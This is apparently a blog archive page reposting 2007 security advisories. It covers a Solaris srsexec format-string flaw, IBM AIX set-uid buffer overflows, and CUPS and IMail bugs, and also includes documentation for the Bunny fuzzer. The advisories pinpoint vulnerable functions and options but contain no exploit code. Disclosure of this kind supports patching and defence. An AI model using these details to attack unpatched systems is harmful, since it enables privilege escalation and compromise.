" Tracking #: 9219583 Description: BUFFER OVERFLOW IN XDB.XDB_PITRIG_PKG.PITRIG_DROPMETADATA Status: Issue fixed in main codeline, scheduled for a future CPU "

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-4517 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

02/01/2007 Initial vendor notification
02/01/2007 Initial vendor response
11/02/2007 Third-party public exploit release
11/07/2007 Public disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright � 2007 iDefense, Inc.

Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customer service for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

Sun Microsystems Solaris srsexec Format String Vulnerability

2008-02-08T07:07:00.000-08:00

tomado de:http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=610

PUBLIC ADVISORY: 11.02.07

Home // Current Intelligence // Vulnerability Advisories // Public Advisory: 11.02.07

Sun Microsystems Solaris srsexec Format String Vulnerability

I. BACKGROUND

The srsexec utility is part of the SRS Proxy Core package that is available with Solaris 10. This package is used to monitor the performance of clients running Solaris from a centralized administrative console. This software would be installed on all of the client machines being monitored and is set-uid root by default. More information is available at the vendor's site.

http://www.sun.com/service/netconnect/

II. DESCRIPTION

Local exploitation of a format string vulnerability in the srsexec binary, optionally included in Sun Microsystems Inc.'s Solaris 10, allows attackers to execute arbitrary code with root privileges.

The vulnerability exists since attacker supplied data is passed directly to the syslog() function as the format string. This allows an attacker to overwrite arbitrary memory with arbitrary data, and can result in the execution of arbitrary code with root privileges.

III. ANALYSIS

Exploitation results in the execution of arbitrary code with root privileges. In order to exploit this vulnerability, an attacker must have the ability to execute the set-uid root binary.

The SRS Proxy Core package is not installed by default, but it is a common application.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Solaris 10 with the SUNWsrspx package installed. In order to determine if this package is installed, an administrator can execute the following command:

  pkginfo SUNWsrspx

If this command returns 'ERROR: information for "SUNWsrspx" was not found', then the system does not have the affected package installed and is not vulnerable.

V. WORKAROUND

To prevent exploitation of this vulnerability, remove the set-uid bit from the srsexec binary as shown below.

  # chmod -s /opt/SUNWsrspx/bin/srsexec

VI. VENDOR RESPONSE

Sun Microsystems has addressed this vulnerability by releasing patches. For more information, consult Sun Alert 103119 at the following URL.

http://sunsolve.sun.com/search/document.do?assetkey=1-26-103119-1

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-3880 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

07/18/2007 Initial vendor notification
07/18/2007 Initial vendor response
11/02/2007 Coordinated public disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson of VeriSign iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

IBM AIX Multiple Vulnerabilities

2008-02-08T07:06:00.000-08:00

tomado de:http://www.securiteam.com/unixfocus/6R0080AKAA.html

Multiple vulnerabilities have been discovered in IBM AIX. These vulnerabilities would allow local exploitation that could lead to elevated privileges.

Credit:
The information has been provided by iDefense.
The original article can be found at: http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=617, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=616, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=615, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=614, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=613, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=612, http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=611

Audit your web server for security holes - see what the hackers see.
Sign up for a scan today - risk free!

Vulnerable Systems:
* IBM AIX version 5.3 (5300-06) - ftp
* IBM AIX version 5.3 (5300-06) and 5.2 - bellmail, lquerypv, lqueryvg
* IBM AIX version 5.2 - dig, crontab, swcons

IBM AIX ftp domacro Parameter Buffer Overflow Vulnerability
The ftp program is a client application for accessing data stored on FTP servers. This client is responsible for interfacing with users and speaking the FTP protocol with remote servers. Under AIX, the ftp program is installed by default and is set-uid root.

Local exploitation of a buffer overflow vulnerability in the ftp client of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.

The problem specifically exists within the domacro() function. This function is called when executing a macro via the '$' command within the ftp program. When executing a macro, the parameter is copied to a fixed size stack buffer using an unbounded call to strcpy(). By specifying a long argument, an attacker is able to overwrite program control data located on the stack and take control of the affected process.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4217

IBM AIX bellmail Stack Buffer Overflow Vulnerability
bellmail is a mail user-agent (MUA) and is commonly used for accessing locally stored electronic mail messages. Under AIX, the bellmail program is installed by default and is set-uid root.

Local exploitation of a buffer overflow vulnerability in the bellmail program of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.

The problem specifically exists within sendrmt function. This function is called when a user tries to send mail using the "m" command. Within this function, several sprintf calls are made to concatenate user-supplied input with static strings. No bounds checking is performed to ensure that the resulting string will fit in the destination buffer located on the stack. By supplying a long parameter, an attacker is able to overwrite program control data located on the stack and take control of the affected process.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4623

IBM AIX lquerypv Stack Buffer Overflow Vulnerability
The lquerypv utility is used to examine the properties of a physical volume in a volume group. It is installed set-uid root by default on multiple versions of AIX.

Local exploitation of a stack buffer overflow vulnerability in IBM Corp.'s AIX operating system may allow an attacker to execute arbitrary code with root privileges.

The vulnerability exists within the parsing of the '-V' command line option. The argument to this option is copied into a fixed size stack buffer using the sprintf() function without properly validating the length. This leads to an exploitable stack buffer overflow.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below:
http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4513

IBM AIX lqueryvg Stack Buffer Overflow Vulnerability
The lqueryvg utility is used to examine the properties of disk volume groups. It is installed set-uid root by default on multiple versions of AIX.

Local exploitation of a stack buffer overflow vulnerability in IBM Corp.'s AIX operating system may allow an attacker to execute arbitrary code with root privileges.

The vulnerability exists within the parsing of the '-p' command line option. The argument to this option is copied into a fixed size stack buffer using the sprintf() function without properly validating the length. This leads to an exploitable stack buffer overflow.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4513

IBM AIX dig dns_name_fromtext Integer Underflow Vulnerability
dig is a utility that is commonly used for DNS diagnostics. Under AIX 5.2, the dig program is installed by default and is set-uid root.

Local exploitation of an integer underflow vulnerability in the dig program of IBM Corp.'s AIX operating system allows attackers to execute arbitrary code with root privileges.

The problem specifically exists within dns_name_fromtext function within the libdns.a library. This function is called when processing the '-y' command line parameter to the dig program. By supplying a specially crafted TSIG key parameter, an attacker is able to cause an integer underflow, resulting in potentially exploitable heap corruption.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4622

IBM AIX 5.2 crontab BSS Buffer Overflow Vulnerability
The crontab program is a user utility that enables users to create, remove, and edit cron jobs. The cron jobs will then later be executed, on behalf of the user, at the specified time. Under AIX, the crontab program is installed by default and is set-uid root.

Local exploitation of a buffer overflow vulnerability in the crontab program of IBM Corp.'s AIX 5.2 operating system allows attackers to execute arbitrary code with root privileges.

The problem specifically exists within the main function. While processing command line arguments, the crontab program will copy a user-supplied argument to a fixed size BSS (data segment) buffer. Since no bounds checking is performed, it's possible to overwrite a large portion of the data stored in the BSS memory area.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below. http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CVE Information:
CVE-2007-4621

IBM AIX swcons Local Arbitrary File Access Vulnerability
The swcons program is a set-uid root application which is installed by default on IBM AIX. It allows for console logs to be temporarily logged to a file or device.

Local exploitation of a file access vulnerability in the swcons command included in multiple versions of IBM Corp.'s AIX could allow for the creation or modification of arbitrary files anywhere on the system.

The vulnerability specifically exists due to a lack of sanity checking when using the -p option. If a user specifies a file with the -p option, the contents of that file will be overwritten with 65,535 bytes of uncontrolled data. If the file doesn't exist, it will be created. In both cases, the file will also be converted to mode 222, which allows all users on the system to modify it. By specifying a system file, users can cause a denial of service condition or elevate privileges.

Vendor response:
IBM Corp. has addressed this vulnerability by releasing interim fixes. More information can be found via the Bulletins tab of IBM's Subscription Service for UNIX and Linux servers. You can reach this service by clicking the URL shown below: http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=1

CUPS IPP Tags Memory Corruption Vulnerability

2008-02-08T07:05:00.000-08:00

tomado de:http://secunia.com/secunia_research/2007-76/advisory/

Secunia Research: CUPS IPP Tags Memory Corruption Vulnerability

======================================================================

Secunia Research 31/10/2007

- CUPS IPP Tags Memory Corruption Vulnerability -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* CUPS 1.3.3.

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately Critical
Impact: System Access
Where: Local network

======================================================================
3) Vendor's Description of Software

"CUPS provides a portable printing layer for UNIXÂ®-based operating
systems. It was developed by Easy Software Products and is now owned
and maintained by Apple Inc. to promote a standard printing solution.
It is the standard printing system in Mac OS X and most Linux
distributions".

Product Link:
http://www.cups.org/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in CUPS, which can be
exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error within the
"ippReadIO()" function in cups/ipp.c when processing IPP (Internet
Printing Protocol) tags. This can be exploited to overwrite one byte
on the stack with a zero by sending an IPP request containing
specially crafted "textWithLanguage" or "nameWithLanguage" tags.

Successful exploitation allows execution of arbitrary code.

======================================================================
5) Solution

Patches for various Linux distributions should be available shortly.

======================================================================
6) Time Table

16/10/2007 - Vendor notified.
22/10/2007 - vendor-sec notified.
31/10/2007 - Public disclosure.

======================================================================
7) Credits

Discovered by Alin Rad Pop, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2007-4351 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-76/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

IPSwitch IMail Server IMail Client Buffer Overflow

2008-02-08T07:04:00.000-08:00

Tomado de:http://secunia.com/secunia_research/2007-81/advisory/

Secunia Research: IPSwitch IMail Server IMail Client Buffer Overflow

======================================================================

                    Secunia Research 30/10/2007

       - IPSwitch IMail Server IMail Client Buffer Overflow -

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Vendor's Description of Software.....................................3
Description of Vulnerability.........................................4
Solution.............................................................5
Time Table...........................................................6
Credits..............................................................7
References...........................................................8
About Secunia........................................................9
Verification........................................................10

======================================================================
1) Affected Software

* IMail Client 9.22 included with IPSwitch IMail Server 2006.22.

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Denial of Service
       System compromise
Where:  Remote

======================================================================
3) Vendor's Description of Software

The IMail Client "is provided for those who are administering IMail
Server on the NT workstation on which IMail Server is installed. It is
useful for reading the 'root' mailbox, working with seldom-used
accounts, and testing.".

Product Link:
http://www.ipswitch.com/purchase/products/imail_server.asp

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in the IMail Client,
which potentially can be exploited by malicious people to compromise a
user's system.

The vulnerability is caused due to a boundary error within the IMail
Client when processing emails containing multipart MIME data. This can
be exploited to cause a data segment-based buffer overflow via an
overly long "boundary" parameter (more than 212 bytes).

======================================================================
5) Solution

The vendor recommends users to delete the IMail Client application,
which will be removed from the next major release of the IPSwitch
IMail Server.

======================================================================
6) Time Table

24/09/2007 - Vendor notified.
25/09/2007 - Vendor response.
30/10/2007 - Public disclosure.

======================================================================
7) Credits

Discovered by Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned
CVE-2007-4345 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate
customers with verified and reliable vulnerability intelligence
relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2007-81/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================

Bunny the Fuzzer

2008-02-08T07:02:00.000-08:00

Tomado de : http://code.google.com/p/bunny-the-fuzzer/wiki/BunnyDoc

BunnyDoc

Project documentation

Bunny the Fuzzer

Written and maintained by Michal Zalewski <lcamtuf@google.com>.
Copyright 2007 Google Inc, rights reserved.
Released under terms and conditions of the Apache License, version 2.0.

What is this?

Bunny is a closed loop (feedback driven), high-performance, general purpose protocol-blind fuzzer for C programs (though in principle easily portable to any other imperative procedural language).

The novelty of this tool arises from its use of compiler-level integration to seamlessly inject precise and reliable instrumentation hooks into the traced program. These hooks enable the fuzzer to receive real-time feedback on changes to the function call path, call parameters, and return values in response to variations in the input data.

This architecture makes it possible (and quite simple!) to significantly improve the coverage of the testing process without a noticeable performance impact usually associated with other attempts to peek into run-time internals.

Why bother?

Traditional fuzzing offers a very shallow code penetration for non-trivial applications and input formats. If a file of a hundred bytes or so needs to have three bits flipped to a particular value to reach a vulnerable function, the likelihood of this being stumbled upon by a regular fuzzer is negligible.

To work around this problem, specialized fuzzers are devised to properly handle specifics of the tested protocol, and focus on known tricky inputs. Unfortunately, this approach is time-consuming, and initial assumptions made by the operator may artificially limit test coverage.

"Smart" fuzzers that observe changes in the execution of a process in response to changes to the input data should in theory be able to overcome many of these limitations. Unfortunately, most designs proposed to date attempted to instrument run-time disassembly, trace applications step-by-step, or take similar expensive routes, suffering a massive performance blow that effectively canceled out any efficiency gain.

Bunny tries to approach the challenge from a slightly different angle, and injects scalable, high-performance probes during precompilation stage. This results in several key advantages:

The approach does not feature a steep setup or learning curve. There is no training or protocol knowledge necessary; any project can be automatically instrumented with a drop-in replacement for GCC, and is immediately ready for testing:

      CC=/path/to/bunny-gcc ./configure
      make

There is no significant performance penalty involved. Core fuzzing components are designed for highest speed, and feature cyclic SHM output buffers with userland spinlocks, keep-alive architecture, and syscall overhead limited to bare minimum. The instrumentation is injected in key HLL control points, limiting the amount of data to be analyzed. On a typical dual-core P4 desktop, fuzzing of a small utility peaks at 3600 execs/second, compared to 4000 for a dummy loop.

Both small and large real-life components can be instrumented and tested alike. From zlib to libpng to OpenSSH, there is no need to alter the build and testing process.

Fine-grained configuration and easy automation. The fuzzer implements 9 neat fuzzing strategies and offers detailed controls over their behavior, fuzzing depth, and the like. It features automated crash case sorting and annotation and random-run scenarios for unattended, massively parallel setups.

Smart features aside, Bunny is a good "classic" fuzzing application, too - with network output support and a number of fairly comprehensive fault injection strategies, it can be used to attack non-instrumented applications as well.

You mentioned prior work, eh?

Yes; several other folks toyed with the idea in the past and released papers on this topic - most notably:

Automated Whitebox Fuzz Testing by Godefroid, Levin, Molnar
A Smart Fuzzer for x86 Executables by Lanzi, Martignoni, Monga, Paleari

These designs are difficult to independently evaluate, as they remain non-public, but generally employ assembly-level instrumentation, which would appear to provide output of lower analytic quality.

A related public work at Google is Flayer by Will Drewry and Tavis Omandy - a Valgrind-based tool that can be used to reach potentially vulnerable code, then work your way up to figure out what inputs get you there:

Information flow tracing and software testing

4. So how does it work, exactly?

On a high level, the algorithm is remarkably simple:

Seed fuzzing queue with a known good input file.
Attempt several deterministic, sequential fuzzing strategies for subsequent regions in the input file, as well as for regions that are known to affect execution paths based on previously recorded data.
If any change resulted in a never previously observed execution path, store the input that triggered it and queue it for further testing.
If any change resulted in an interesting change in any function call parameter or return value within a known execution path (for example, we now have -3 where we had 7 previously), store and queue the input.
If program fault is sensed for any input (crash, hang, etc), record this event and make copy of the offending input data.
When done, fetch next input to be tested from queue, go to 2.

Bunny implements a total of 9 fuzzing stages:

Fully random fuzzing of known execution path effectors
Deterministic, walking bit flip of variable length
Deterministic, walking value set operation of variable length
Walking random value set of variable length
Deterministic, walking block deletion of variable length
Deterministic, walking block overwrite of variable length
Deterministic, walking block duplication of variable length
Deterministic, walking block swap of variable length
Random stacking of any of the above operation (last resort)

How do I use it?

Compile the fuzzer suite itself (make), then run the following against your target project:

    cd /path/to/project/
    CC=/path/to/bunny-gcc ./configure
    make

Alternatively, simply use bunny-gcc to compile any standalone code, exactly the way you would use GCC. The wrapper compiles OpenSSH, bash, and a number of other open source projects cleanly - but if you encounter problems, do let me know.

Once compiled, the resulting binary can be manually traced by invoking bunny-trace utility to peek at how the fuzzer sees the world, for example:

    /path/to/bunny-trace /path/to/executable
    +++ Trace of '/path/to/executable' started at 2007/09/07 21:06:01 +++
    [19179] 000 .- main()
    [19179] 001 | .- foo1(1)
    [19179] 001 | `- = 7
    [19179] 001 | .- foo2(2)
    [19179] 001 | `- = 9
    [19179] 001 | .- something(3, 4)
    [19179] 001 | `- = 0
    [19179] 001 | .- name13(5, 6, 7)
    [19179] 001 | `- = 0
    [19179] 000 +--- 10
    [19179] 000 `- = 0
    --- Process 19179 exited (code=0) ---

To run a proper fuzzing session, create a new directory (e.g., test) with two empty subdirectories: in_dir and out_dir. Put the desired input file to use as a seed for fuzzing in in_dir, under any name of your choice. Next, invoke bunny-main, passing the paths to your input and output directories, as well as directions on how to reach the target application or network service, using appropriate command-line switches.

Two most common usage scenarios are:

    mkdir test
    mkdir test/in_dir
    mkdir test/out_dir
    cp sample.jpg test/in_dir/

    # If program accepts data on stdout:
    ./bunny-main -i test/in_dir -o test/out_dir /path/to/app

    # If program requires disk file input:
    ./bunny-main -i test/in_dir -o test/out_dir -f test/infile.jpg \
                  /path/to/app test/infile.jpg

And that's it - the output will be saved to out_dir/BUNNY.log; crash cases will go to out_dir/FAULT*. Sit back and relax. If you want fast and dirty results, consider adding -q and -k parameters to the command line.

For more sophisticated jobs, below is a list of all command line options supported by bunny-main (defaults are reported when the program is called with -h switch):

    -f file     - write fuzzer output to specified file before each testing
                  round, instead of using fuzzed application's stdin.

    -t h:p      - write fuzzer output to a TCP server running at host 'h',
                  port 'p', after launching the traced application.

    -u h:p      - write fuzzer output to UDP server, likewise.

    -l port     - write fuzzer output to the first TCP client to connect to
                  specified port.

  Execution control:

    -s nn       - time out if no instrumentation feedback is received for 'nn'
                  milliseconds. Such a situation will be marked as a DoS
                  condition and saved for analysis.

    -x nn       - time out unconditionally after 'nn' milliseconds.

    -d          - allow "dummy" mode: perform a single round of fuzzing even
                  if no instrumentation is detected in the traced application,
                  and just detect crashes in response to dumb fuzzing.

    -n          - do not abandon a fuzzing round in which a fault occurred.
                  May end up producing multiple similar crash cases, but
                  slightly improves coverage.

    -g          - use audible notification (aka "beep") to alert of crashes.
                  The exact behavior of this depends on your terminal settings.

  Fuzzing process control (these options affect performance):

    -B nn[+s]   - controls bit flip fuzzing stage (1/8); limits flip run length
                  to 'nn' bits, and uses a stepover of 's'.

    -C nn[+s]   - controls chunk operations; limits chunk size to 'nn' bytes,
                  uses a stepover of 's'.

                  Note that chunk operations are time-consuming; keep this and
                  -O options in check for larger files.

    -O nn       - controls chunk operations; limits chunk displacement to 'nn'
                  bytes.

    -E nn       - controls effector registration; limits the number of
                  effectors associated with a single trace value. Prevents
                  checksums and similar fields from diluting the effector set.

    -X b:nn     - affects value walk stage (2/8); Bunny uses a set of
                  predefined "interesting" values, such as -1, 0, or MAX_INT,
                  in order to trigger fault conditions (see config.h). You can
                  override this set by specifying multiple -X parameters. First
                  field, 'b', specified byte width (1, 2, or 4), second field
                  is a signed integer to use.

    -Y nn       - controls random walk stage (3/8); sets the number of random
                  values to try before moving on.

    -R nn       - controls random exploration stages; resets fuzzed file to
                  its pristine state every 'nn' tries, stacks random
                  modifications in between.

    -S nn       - controls random exploration stages; sets the number of random
                  operations stacked in every round.

    -N nn       - controls queue branching; caps the number of call paths
                  registered in a single fuzzing round.

    -P nn       - controls queue branching; likewise, but for parameter
                  variations.

    -L nn       - controls per-round calibration cycle count; these cycles
                  are used to establish execution baseline, detect variable
                  parameters such as time(0) or getpid() output, and the like.
                  Use -L 1 to speed things up if you have no reason to suspect
                  these are used by a program, or higher values to detect
                  really sneaky cases.

    -M nn       - controls trace depth; limits the number of instrumented
                  function calls analyzed in each run. This is the primary
                  method of managing tracing performance, memory usage, and
                  trace time.

    -F nn       - controls block operations; caps fuzzable data set size to
                  prevent runaway size increments in some rare cases. By
                  default set to initial set size, times 2.

    -8          - controls value set stage; enables the use of all possible
                  8-bit values, instead of the default subset of "interesting"
                  ones. Recommended, time permitting.

    -r          - controls parameter variation detection; enables finer-grained
                  value ranging to detect more subtle differences (will result
                  in far more variable paths being discovered).

    -z          - disables parameter variation detection; parameter path forks
                  will not be recorded. This is a very coarse but quick method.

    -k          - disables deterministic fuzzing rounds, and goes straight to
                  random stacking. This is a particularly useful for easy
                  parallelization.

    -q          - randomizes queue processing; this might speed up discovery
                  of deeper-nested problems, though there is no guarantee
                  whatsoever.

Advanced usage notes

This section contains assorted tips for optimizing fuzzing performance and dealing with complex input scenarios

Minimizing fuzzing effort

For certain applications, it might be quite obviously highly advisable to make generic tweaks to the code in order to improve odds of fuzzing, such as the removal of CRC32 checks, or flipping the switch on null encryption schemes.

Selective instrumentation tools

bunny-gcc will automatically instrument function names, parameters, nesting level, and return values. This is optimal for almost all projects, large and small - but when dealing with ultra-compact code, or targeting the inner workings of a single suspect function, you can install hooks manually, by adding a BunnySnoop preprocessor directive with an integer parameter inline in the function:

    BunnySnoop table[0];

WARNING: Make sure that, no matter which call path within a function is taken, a constant number of BunnySnoop statements will be encountered. A mismatch will cause a runtime error, because the fuzzer can't immediately figure out how to compare such variations in a meaningful manner.

In some cases, it is undesirable to instrument a particular function - for example, if it is invoked in a read loop to perform a fairly mundane task, and produces megabytes of useless trace information; to manually suppress instrumentation, use BunnySkip directive immediately before a { ... } block, for example:

    static int do_boring_stuff(char* buf) BunnySkip {
      ...
    }

Advanced output structure management

Bunny supports selective fuzzing of files and multi-packet network output:

Each file placed in there is output in a separate write; if you wish to send multiple packets, this is a method to achieve this. Files in this directory will be sorted and used in a default alphasort order. e.g.: packet0001, packet0002, packet0003 ...

File names ending with .keep will not be fuzzed, but passed through as-is. This is useful for excluding chunks of a large input set from the tests for performance reasons.

If a 0-sized *.keep file is encountered, and the output is to a network socket, the output component will pause to sink an input packet received from the remote party before continuing. This can be used to fuzz interactive client-server communications (e.g., wait for a response before sending a new command).

The number of "fuzzable" bytes has a linear impact on the speed of testing, simply because most of the fuzzing steps involve deterministic, sequential changes to the data. File sizes between 1 and 250 bytes are probably optimal, assuming default settings.

Troubleshooting

This section describes common real-world fuzzing problems, and suggestions on how to deal with them.

Problem: I cannot build the fuzzer itself because of some -Wno-pointer-sign error.

Suggestion: Use a newer version of GCC or remove the first occurrence of -Wno-pointer-sign in project's Makefile.

Problem: When I try to issue make on a program to be instrumented, I get libtool lock errors and the compilation hangs.

Suggestion: This is because of an ill-conceived check in some autoconf files. This check inevitably breaks with some compilers. Re-run ./configure but append --disable-libtool-lock to its command-line options, then try make again.

Problem: Bunny completes a couple of fuzzing rounds and gives up.

Suggestion: The utility can't find enough interesting call paths to follow. Try the following:

If you are fuzzing a library, make sure not only the test program, but also the library itself is properly instrumented, and that your test program indeed uses the instrumented copy, not a system-wide version. Use LD_LIBRARY_PATH to guide the dynamic linker.
Make sure that the targeted code does not reside in a single, compact function - if so, you have to instrument the function manually using BunnySnoop directive (see above).
Make sure that the initial input file makes sense to the traced program and triggers the instrumented functionality.
If any mentions of skipped function calls appear in the output of the fuzzer, Crank up the depth of instrumentation (-P parameter) to a higher value.
Crank up the intensity of fuzzing to get to other code locations: specify -8, increase limits for -R, -S, -B, -C, and -O options.

Problem: Bunny keeps finding tons of new call paths and there is no end in sight.

Suggestion: Too much branching is undesirable, as it might compromise the coverage of performed tests. Try the following:

Adjust -M parameter to reduce the depth of instrumentation,
Ensure uniform testing space: use -q option to randomize queue processing, -k to skip sequential fuzzing rounds,
Run the application under bunny-trace and see if there are any recursive calls that do not serve an important function. If so, use BunnySkip to selectively disable instrumentation.
If most of these are parameter-related variations, decrease -P to a very small value to rate-limit this aspect of exec path exploration, or -z to inhibit it altogether.

Problem: Fuzzing is very slow, and I'm getting bogus "timeout" crash reports.

Suggestion: The traced application is painfully slow. Try the following:

Adjust -s and -x options to raise time quotas allotted to each run,
Reduce input file size (for example, use a 2x2 JPEG with no EXIF data or comments, instead of a 100k photo),
Reduce -R, -S, -B, -C, and -O option values to speed up fuzzing, cosider using -k to disable most fuzzing rounds altogether,
Move the process to a faster machine.
Investigate how to speed up the traced application - enable optimization, prelink, add code to bail out on known DoS conditions, etc.

Problem: I want to trace a non-instrumented application.

Suggestion: Use -d option, and be sure to crank up -R, -S, -B, and -C limits, possibly use -8 option - in this mode, Bunny will execute a single round of testing only, so get the best of it.

Limitations & known issues

The approach implemented by Bunny will be ineffective against protocols that implement very strong checksums or other constraints that are nearly impossible to brute-force - although unlike traditional fuzzing, it should be reasonably effective against weak checksums.

When operating on auto-instrumented C-function level, it is unlikely for this or any other protocol-blind fuzzer to discover new non-trivial syntax (such as an undocumented HTML tag or a complex protocol message) if it is not a part of the input file and cannot be gradually derived from it, unless you instrument functions such as strcmp(); but then again, bunny should be remarkably more effective once such a syntax is accidentally stumbled upon.

Known issues with the current code:

Multiple threads and processes are supported, and input will be collected from all threads and properly separated - but the trace continues only as long as the initial process is running, and only the initial process will be surveyed for SEGV and similar fault conditions. There is no easy way to intercept child process signals on Linux without resorting to dirty ptrace() tricks or signal handler injection.

The only platforms known to work fine are Linux, flavors of BSD, and Cygwin on IA32 platforms. Support for 64-bit and other unix systems is not confirmed. There is no support for non-x86 architectures, although this requires very few tweaks to correct.

The C parser and its hooks is not necessarily compatible with restricted dialects of C that do not implement C99 + GNU extensions. This is because the instrumentation code uses __attribute__ features to gain unobtrusive access to library functions and suppress certain warnings. bunny-gcc will strip any flags that restrict the dialect of an input file, and this might have an adverse effect in some rare circumstances.

bunny-exec registers call paths in the order of appearance, and can't recover cleanly from a situation where this changes randomly because of scheduler decisions when multiple threads are spawned (nearly) at once. I see no easy way to solve this, and it might be not worth the effort.

On calls to longjmp or with newly spawned threads, the nesting level reported by bunny-trace might be off. This does not affect the tracing process.

varargs are not supported, which limits the amount of data collected about some relatively rare internal functions (again, the overhead needed for handling this is considerable, and there seem to be no cases that would warrant it).

Every unique call path encountered (but not every unique parameter sequence) uses up several kilobytes of memory and is kept indefinitely in process address space. The record contains important calibration and effector data needed to properly handle revisits to that call path with new parameters, and cannot be simply deallocated. This is typically not a problem for short-run fuzzing, but when we enter the domain of billions of exec cycles, we might eventually hit the 2 GB limit. Storing older data on disk might be advisable.

Oracle Workspace Manager SQL Injection Flaw

2008-02-08T07:01:00.000-08:00

tomado de: http://www.ngssoftware.com/advisories/high-risk-vulnerability-in-oracle-workspace-manager/

High Risk Vulnerability in Oracle Workspace Manager

